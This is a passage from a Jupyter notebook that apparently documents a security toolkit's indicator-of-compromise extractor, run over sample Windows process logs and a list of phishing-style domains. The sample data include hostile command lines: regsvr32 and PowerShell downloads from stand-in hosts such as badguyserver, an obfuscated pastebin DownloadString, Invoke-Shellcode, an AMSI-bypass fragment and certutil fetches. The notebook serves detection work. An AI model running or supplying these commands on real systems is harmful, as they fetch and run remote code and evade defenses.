       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
       "      <td>MSTICAdmin</td>\n",
       "      <td>MSTICAlertsWin1</td>\n",
       "      <td>0xfaac27</td>\n",
       "      <td>0x175c</td>\n",
       "      <td>C:\\Diagnostics\\UserTmp\\rundll32.exe</td>\n",
       "      <td>%%1936</td>\n",
       "      <td>0xbc8</td>\n",
       "      <td>.\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe</td>\n",
       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
       "      <td>0x0</td>\n",
       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
       "      <td>2019-01-15 05:15:16.400</td>\n",
       "      <td>sibling</td>\n",
       "      <td>1</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>4</td>\n",
       "      <td>NaN</td>\n",
       "    </tr>\n",
       "  </tbody>\n",
       "</table>\n",
       "</div>"
      ],
      "text/plain": [
       "   Unnamed: 0                              TenantId  \\\n",
       "0           0  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
       "1           1  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
       "2           2  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
       "3           3  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
       "4           4  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
       "\n",
       "                      Account  EventID            TimeGenerated  \\\n",
       "0  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:15.677   \n",
       "1  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:16.167   \n",
       "2  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:16.277   \n",
       "3  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:16.340   \n",
       "4  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:16.400   \n",
       "\n",
       "          Computer                                SubjectUserSid  \\\n",
       "0  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
       "1  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
       "2  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
       "3  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
       "4  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
       "\n",
       "  SubjectUserName SubjectDomainName SubjectLogonId NewProcessId  \\\n",
       "0      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x1580   \n",
       "1      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x16fc   \n",
       "2      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x1700   \n",
       "3      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x1728   \n",
       "4      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x175c   \n",
       "\n",
       "                        NewProcessName TokenElevationType ProcessId  \\\n",
       "0       C:\\Diagnostics\\UserTmp\\ftp.exe             %%1936     0xbc8   \n",
       "1       C:\\Diagnostics\\UserTmp\\reg.exe             %%1936     0xbc8   \n",
       "2       C:\\Diagnostics\\UserTmp\\cmd.exe             %%1936     0xbc8   \n",
       "3  C:\\Diagnostics\\UserTmp\\rundll32.exe             %%1936     0xbc8   \n",
       "4  C:\\Diagnostics\\UserTmp\\rundll32.exe             %%1936     0xbc8   \n",
       "\n",
       "                                                          CommandLine  \\\n",
       "0                                    .\\ftp  -s:C:\\RECYCLER\\xxppyy.exe   \n",
       "1  .\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !   \n",
       "2                                  cmd  /c \"systeminfo && systeminfo\"   \n",
       "3                                            .\\rundll32  /C 42424.exe   \n",
       "4                        .\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe   \n",
       "\n",
       "             ParentProcessName TargetLogonId  \\\n",
       "0  C:\\Windows\\System32\\cmd.exe           0x0   \n",
       "1  C:\\Windows\\System32\\cmd.exe           0x0   \n",
       "2  C:\\Windows\\System32\\cmd.exe           0x0   \n",
       "3  C:\\Windows\\System32\\cmd.exe           0x0   \n",
       "4  C:\\Windows\\System32\\cmd.exe           0x0   \n",
       "\n",
       "                       SourceComputerId           TimeCreatedUtc NodeRole  \\\n",
       "0  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:15.677   source   \n",
       "1  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.167  sibling   \n",
       "2  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.277  sibling   \n",
       "3  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.340  sibling   \n",
       "4  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.400  sibling   \n",
       "\n",
       "   Level  ProcessId1  NewProcessId1 IoCType Observable  SourceIndex Input  \n",
       "0      0         NaN            NaN     NaN        NaN            0   NaN  \n",
       "1      1         NaN            NaN     NaN        NaN            1   NaN  \n",
       "2      1         NaN            NaN     NaN        NaN            2   NaN  \n",
       "3      1         NaN            NaN     NaN        NaN            3   NaN  \n",
       "4      1         NaN            NaN     NaN        NaN            4   NaN  "
      ]
     },
     "execution_count": 19,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "input_df = data=process_tree.head(20)\n",
    "output_df = ioc_extractor.extract(data=input_df, columns=['NewProcessName', 'CommandLine'])\n",
    "# set the type of the SourceIndex column. In this case we are matching with the default numeric index.\n",
    "output_df['SourceIndex'] = pd.to_numeric(output_df['SourceIndex'])\n",
    "merged_df = pd.merge(left=input_df, right=output_df, how='outer', left_index=True, right_on='SourceIndex')\n",
    "merged_df.head()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## IPython magic\n",
    "\n",
    "You can use the line magic `%ioc` or cell magic `%%ioc` to extract IoCs from text pasted directly into a cell\n",
    "\n",
    "The ioc magic supports the following options:\n",
    "\n",
    "```\n",
    "--out OUT, -o OUT  \n",
    "    The variable to return the results in the variable `OUT`\n",
    "    Note: the output variable is a dictionary iocs grouped by IoC Type\n",
    "--ioc_types IOC_TYPES, -i IOC_TYPES\n",
    "    The types of IoC to search for (comma-separated string)\n",
    "```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 20,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:17.493379Z",
     "start_time": "2020-02-10T19:52:17.483385Z"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "[('ipv4', ['1.2.3.4']),\n",
       " ('ipv6', ['2:56:07', '2:20:35']),\n",
       " ('dns',\n",
       "  ['finance-usbnc.info',\n",
       "   'www.phonechallenges-submit.site',\n",
       "   'acconut-verify.com',\n",
       "   'phonechallenges-submit.site',\n",
       "   'seisolarpros.org',\n",
       "   'youtube.service-activity-checkup.site',\n",
       "   'w3-schools.org',\n",
       "   'isis-online.net',\n",
       "   'two-step-checkup.site',\n",
       "   'recovery-options.site',\n",
       "   'inztaqram.ga',\n",
       "   'system-services.site',\n",
       "   'malcolmrifkind.site',\n",
       "   'instagram-com.site',\n",
       "   'cpanel-services.site',\n",
       "   'niaconucil.org',\n",
       "   'accounts-drive.com',\n",
       "   'software-updating-managers.site',\n",
       "   'www.drive-accounts.com',\n",
       "   'service-issues.site',\n",
       "   'customers-activities.site',\n",
       "   'x09live-ix3b.account-profile-users.info',\n",
       "   'unirsd.com',\n",
       "   'bahaius.info',\n",
       "   'skynevvs.com',\n",
       "   'customers-service.ddns.net',\n",
       "   'leslettrespersanes.net',\n",
       "   'google.drive-accounts.com',\n",
       "   'drive-accounts.com',\n",
       "   'service-activity-checkup.site',\n",
       "   'mobile.phonechallenges-submit.site',\n",
       "   'yah00.site']),\n",
       " ('url',\n",
       "  ['https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password']),\n",
       " ('windows_path', ['C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt']),\n",
       " ('linux_path',\n",
       "  ['//two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\\t\\tFeb']),\n",
       " ('md5_hash',\n",
       "  ['3d67ce57aab4f7f917cf87c724ed7dab', '542128ab98bda5ea139b169200a50bce'])]"
      ]
     },
     "execution_count": 20,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "%%ioc --out ioc_capture\n",
    "netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt\n",
    "hostname\tcustomers-service.ddns.net\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
    "URL\thttps://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\t\tFeb 5, 2020, 2:20:35 PM\t\t1\t\n",
    "hostname\tmobile.phonechallenges-submit.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "hostname\tyoutube.service-activity-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "hostname\twww.drive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
    "hostname\tgoogle.drive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
    "domain\tniaconucil.org\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tisis-online.net\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tbahaius.info\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tw3-schools.org\t\tFeb 5, 2020, 2:20:35 PM\t\t12\t\n",
    "domain\tsystem-services.site\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\taccounts-drive.com\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tdrive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t10\t\n",
    "domain\tservice-issues.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\ttwo-step-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tcustomers-activities.site\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tseisolarpros.org\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tyah00.site\t\tFeb 5, 2020, 2:20:35 PM\t\t4\t\n",
    "domain\tskynevvs.com\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\trecovery-options.site\t\tFeb 5, 2020, 2:20:35 PM\t\t4\t\n",
    "domain\tmalcolmrifkind.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tinstagram-com.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tleslettrespersanes.net\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tsoftware-updating-managers.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tcpanel-services.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tservice-activity-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
    "domain\tinztaqram.ga\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tunirsd.com\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tphonechallenges-submit.site\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
    "domain\tacconut-verify.com\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tfinance-usbnc.info\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "FileHash-MD5\t542128ab98bda5ea139b169200a50bce\t\tFeb 5, 2020, 2:20:35 PM\t\t3\t\n",
    "FileHash-MD5\t3d67ce57aab4f7f917cf87c724ed7dab\t\tFeb 5, 2020, 2:20:35 PM\t\t3\t\n",
    "hostname\tx09live-ix3b.account-profile-users.info\t\tFeb 6, 2020, 2:56:07 PM\t\t0\t\n",
    "hostname\twww.phonechallenges-submit.site\t\tFeb 6, 2020, 2:56:07 PM"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 21,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T20:11:59.068838Z",
     "start_time": "2020-02-10T20:11:59.063841Z"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[('ipv4', 1), ('ipv6', 2), ('dns', 32), ('url', 1), ('windows_path', 1), ('linux_path', 1), ('md5_hash', 2)]\n"
     ]
    }
   ],
   "source": [
    "# Summarize captured types\n",
    "print([(ioc, len(matches)) for ioc, matches in ioc_capture.items()])"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 22,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T20:13:43.982346Z",
     "start_time": "2020-02-10T20:13:43.976349Z"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "[('ipv4', ['1.2.3.4']),\n",
       " ('ipv6', ['2:56:07', '2:20:35']),\n",
       " ('linux_path',\n",
       "  ['/usr/localbzzzzzz.sh',\n",
       "   '//two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\\t\\tFeb']),\n",
       " ('md5_hash',\n",
       "  ['3d67ce57aab4f7f917cf87c724ed7dab', '542128ab98bda5ea139b169200a50bce'])]"
      ]
     },
     "execution_count": 22,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "%%ioc --ioc_types \"ipv4, ipv6, linux_path, md5_hash\"\n",
    "netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt\n",
    "tracefile2=/usr/localbzzzzzz.sh\n",
    "hostname\tcustomers-service.ddns.net\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
    "URL\thttps://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\t\tFeb 5, 2020, 2:20:35 PM\t\t1\t\n",
    "hostname\tmobile.phonechallenges-submit.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "hostname\tyoutube.service-activity-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "hostname\twww.drive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
    "hostname\tgoogle.drive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
    "domain\tniaconucil.org\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tisis-online.net\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tbahaius.info\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tw3-schools.org\t\tFeb 5, 2020, 2:20:35 PM\t\t12\t\n",
    "domain\tsystem-services.site\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\taccounts-drive.com\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tdrive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t10\t\n",
    "domain\tservice-issues.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\ttwo-step-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tcustomers-activities.site\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tseisolarpros.org\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tyah00.site\t\tFeb 5, 2020, 2:20:35 PM\t\t4\t\n",
    "domain\tskynevvs.com\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\trecovery-options.site\t\tFeb 5, 2020, 2:20:35 PM\t\t4\t\n",
    "domain\tmalcolmrifkind.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tinstagram-com.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tleslettrespersanes.net\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tsoftware-updating-managers.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tcpanel-services.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tservice-activity-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
    "domain\tinztaqram.ga\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tunirsd.com\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "domain\tphonechallenges-submit.site\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
    "domain\tacconut-verify.com\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
    "domain\tfinance-usbnc.info\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
    "FileHash-MD5\t542128ab98bda5ea139b169200a50bce\t\tFeb 5, 2020, 2:20:35 PM\t\t3\t\n",
    "FileHash-MD5\t3d67ce57aab4f7f917cf87c724ed7dab\t\tFeb 5, 2020, 2:20:35 PM\t\t3\t\n",
    "hostname\tx09live-ix3b.account-profile-users.info\t\tFeb 6, 2020, 2:56:07 PM\t\t0\t\n",
    "hostname\twww.phonechallenges-submit.site\t\tFeb 6, 2020, 2:56:07 PM"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Pandas Extension\n",
    "\n",
    "The decoding functionality is also available in a pandas extension `mp_ioc`.\n",
    "This supports a single method `extract()`. \n",
    "\n",
    "This supports the same syntax\n",
    "as `extract` (described earlier)."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 23,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:53:39.288669Z",
     "start_time": "2020-02-10T19:53:39.245693Z"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<div>\n",
       "<style scoped>\n",
       "    .dataframe tbody tr th:only-of-type {\n",
       "        vertical-align: middle;\n",
       "    }\n",
       "\n",
       "    .dataframe tbody tr th {\n",
       "        vertical-align: top;\n",
       "    }\n",
       "\n",
       "    .dataframe thead th {\n",
       "        text-align: right;\n",
       "    }\n",
       "</style>\n",
       "<table border=\"1\" class=\"dataframe\">\n",
       "  <thead>\n",
       "    <tr style=\"text-align: right;\">\n",
       "      <th></th>\n",
       "      <th>IoCType</th>\n",
       "      <th>Observable</th>\n",
       "      <th>SourceIndex</th>\n",
       "      <th>Input</th>\n",
       "    </tr>\n",
       "  </thead>\n",
       "  <tbody>\n",
       "    <tr>\n",
       "      <th>0</th>\n",
       "      <td>dns</td>\n",
       "      <td>microsoft.com</td>\n",
       "      <td>24</td>\n",
       "      <td>cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>1</th>\n",
       "      <td>url</td>\n",
       "      <td>http://server/file.sct</td>\n",
       "      <td>31</td>\n",
       "      <td>.\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>2</th>\n",
       "      <td>dns</td>\n",
       "      <td>server</td>\n",
       "      <td>31</td>\n",
       "      <td>.\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>3</th>\n",
       "      <td>dns</td>\n",
       "      <td>evil.ps</td>\n",
       "      <td>35</td>\n",
       "      <td>.\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>4</th>\n",
       "      <td>url</td>\n",
       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
       "      <td>37</td>\n",
       "      <td>cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>5</th>\n",
       "      <td>dns</td>\n",
       "      <td>somedomain</td>\n",
       "      <td>37</td>\n",
       "      <td>cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>6</th>\n",
       "      <td>dns</td>\n",
       "      <td>blah.ps</td>\n",
       "      <td>40</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>7</th>\n",
       "      <td>md5_hash</td>\n",
       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
       "      <td>40</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>8</th>\n",
       "      <td>dns</td>\n",
       "      <td>blah.ps</td>\n",
       "      <td>41</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>9</th>\n",
       "      <td>md5_hash</td>\n",
       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
       "      <td>41</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>10</th>\n",
       "      <td>md5_hash</td>\n",
       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
       "      <td>44</td>\n",
       "      <td>implant.exe  81ed03caf6901e444c72ac67d192fb9c</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>11</th>\n",
       "      <td>url</td>\n",
       "      <td>http://badguyserver/pwnme</td>\n",
       "      <td>46</td>\n",
       "      <td>cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>12</th>\n",
       "      <td>dns</td>\n",
       "      <td>badguyserver</td>\n",
       "      <td>46</td>\n",
       "      <td>cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>13</th>\n",
       "      <td>url</td>\n",
       "      <td>http://badguyserver/pwnme</td>\n",
       "      <td>47</td>\n",
       "      <td>.\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>14</th>\n",
       "      <td>dns</td>\n",
       "      <td>badguyserver</td>\n",
       "      <td>47</td>\n",
       "      <td>.\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>15</th>\n",
       "      <td>dns</td>\n",
       "      <td>Invoke-Shellcode.ps</td>\n",
       "      <td>48</td>\n",
       "      <td>.\\powershell  Invoke-Shellcode.ps1</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>16</th>\n",
       "      <td>dns</td>\n",
       "      <td>Invoke-ReverseDnsLookup.ps</td>\n",
       "      <td>49</td>\n",
       "      <td>.\\powershell  Invoke-ReverseDnsLookup.ps1</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>17</th>\n",
       "      <td>dns</td>\n",
       "      <td>Wscript.Shell</td>\n",
       "      <td>67</td>\n",
       "      <td>cmd  /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>18</th>\n",
       "      <td>url</td>\n",
       "      <td>http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...</td>\n",
       "      <td>77</td>\n",
       "      <td>.\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutil...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>19</th>\n",
       "      <td>dns</td>\n",
       "      <td>system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...</td>\n",
       "      <td>77</td>\n",
       "      <td>.\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutil...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>20</th>\n",
       "      <td>ipv4</td>\n",
       "      <td>1.2.3.4</td>\n",
       "      <td>78</td>\n",
       "      <td>netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\b...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>21</th>\n",
       "      <td>dns</td>\n",
       "      <td>wscript.shell</td>\n",
       "      <td>81</td>\n",
       "      <td>cmd  /c \"powershell wscript.shell used to download a .gif\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>22</th>\n",
       "      <td>dns</td>\n",
       "      <td>abc.com</td>\n",
       "      <td>90</td>\n",
       "      <td>c:\\Diagnostics\\UserTmp\\ransomware.exe   @ abc.com abc.wallet</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>23</th>\n",
       "      <td>ipv4</td>\n",
       "      <td>127.0.0.1</td>\n",
       "      <td>102</td>\n",
       "      <td>certutil  -urlcache -split -f http://127.0.0.1/</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>24</th>\n",
       "      <td>url</td>\n",
       "      <td>http://127.0.0.1/</td>\n",
       "      <td>102</td>\n",
       "      <td>certutil  -urlcache -split -f http://127.0.0.1/</td>\n",
       "    </tr>\n",
       "  </tbody>\n",
       "</table>\n",
       "</div>"
      ],
      "text/plain": [
       "     IoCType  \\\n",
       "0        dns   \n",
       "1        url   \n",
       "2        dns   \n",
       "3        dns   \n",
       "4        url   \n",
       "5        dns   \n",
       "6        dns   \n",
       "7   md5_hash   \n",
       "8        dns   \n",
       "9   md5_hash   \n",
       "10  md5_hash   \n",
       "11       url   \n",
       "12       dns   \n",
       "13       url   \n",
       "14       dns   \n",
       "15       dns   \n",
       "16       dns   \n",
       "17       dns   \n",
       "18       url   \n",
       "19       dns   \n",
       "20      ipv4   \n",
       "21       dns   \n",
       "22       dns   \n",
       "23      ipv4   \n",
       "24       url   \n",
       "\n",
       "                                                                                             Observable  \\\n",
       "0                                                                                         microsoft.com   \n",
       "1                                                                                http://server/file.sct   \n",
       "2                                                                                                server   \n",
       "3                                                                                               evil.ps   \n",
       "4                                                            http://somedomain/best-kitten-names-1.jpg'   \n",
       "5                                                                                            somedomain   \n",
       "6                                                                                               blah.ps   \n",
       "7                                                                      aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   \n",
       "8                                                                                               blah.ps   \n",
       "9                                                                      aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   \n",
       "10                                                                     81ed03caf6901e444c72ac67d192fb9c   \n",
       "11                                                                            http://badguyserver/pwnme   \n",
       "12                                                                                         badguyserver   \n",
       "13                                                                            http://badguyserver/pwnme   \n",
       "14                                                                                         badguyserver   \n",
       "15                                                                                  Invoke-Shellcode.ps   \n",
       "16                                                                           Invoke-ReverseDnsLookup.ps   \n",
       "17                                                                                        Wscript.Shell   \n",
       "18  http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...   \n",
       "19  system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...   \n",
       "20                                                                                              1.2.3.4   \n",
       "21                                                                                        wscript.shell   \n",
       "22                                                                                              abc.com   \n",
       "23                                                                                            127.0.0.1   \n",
       "24                                                                                    http://127.0.0.1/   \n",
       "\n",
       "    SourceIndex  \\\n",
       "0            24   \n",
       "1            31   \n",
       "2            31   \n",
       "3            35   \n",
       "4            37   \n",
       "5            37   \n",
       "6            40   \n",
       "7            40   \n",
       "8            41   \n",
       "9            41   \n",
       "10           44   \n",
       "11           46   \n",
       "12           46   \n",
       "13           47   \n",
       "14           47   \n",
       "15           48   \n",
